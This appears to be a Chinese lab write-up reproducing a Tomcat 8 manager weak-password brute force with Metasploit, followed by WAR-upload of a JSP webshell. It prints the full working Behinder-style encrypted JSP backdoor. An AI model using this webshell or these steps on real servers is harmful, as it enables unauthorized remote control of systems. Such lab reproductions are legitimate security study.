Tomcat8 - 弱口令与后台上传getshell的漏洞复现

Tomcat8 - 弱口令与后台上传getshell的漏洞复现

漏洞形成原因

Tomcat manager 登录界面存在弱口令漏洞(tomcat,tomcat),登录成功后有上传点,
压缩包 xxx.wa r的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell

漏洞如何利用

  1. msfconsole 中弱口令爆破,爆破成功后登录;
  2. 找到上传点,上传带有一句话jsp文件的名为xxx.war的包;
  3. 访问 攻击ip地址/xxx/jsp文件路径,再用 webshell 连接工具进行连接。

漏洞复现过程

  • Kali docker 容器中启动此漏洞环境
    在这里插入图片描述
  • 浏览器访问 Kali 的 ip 地址并接上8080端口
    在这里插入图片描述
  • 进入 msfconsole 界面
msfconsole

在这里插入图片描述

  • 查找与 tomcat 相关的模块
search tomcat

在这里插入图片描述

  • 使用 auxiliary/scanner/http/tomcat_mgr_login 模块
use auxiliary/scanner/http/tomcat_mgr_login 
  • 查看需要填写哪些参数
show options

在这里插入图片描述

  • 将 rhosts 设置为目标机
set rhosts 172.16.2.174

在这里插入图片描述

  • 进行爆破
run

在这里插入图片描述
带有+号的即为爆破成功的账号密码

  • 点击 Manager App 进行登录
    在这里插入图片描述
  • 登录后找到上传点
    在这里插入图片描述
  • 将带有一句话的111.jsp文件压缩成zip,并且将压缩后的zip文件改名为111.war
  • jsp 一句话木马,密码为pass
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

  • 上传111.war文件
    在这里插入图片描述

在这里插入图片描述

  • 访问 172.16.2.174:8080/111/111.jsp,显示500
    在这里插入图片描述
  • 上冰蝎
    在这里插入图片描述
    漏洞复现成功,

技术萌新,还请各位大牛多多指点!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值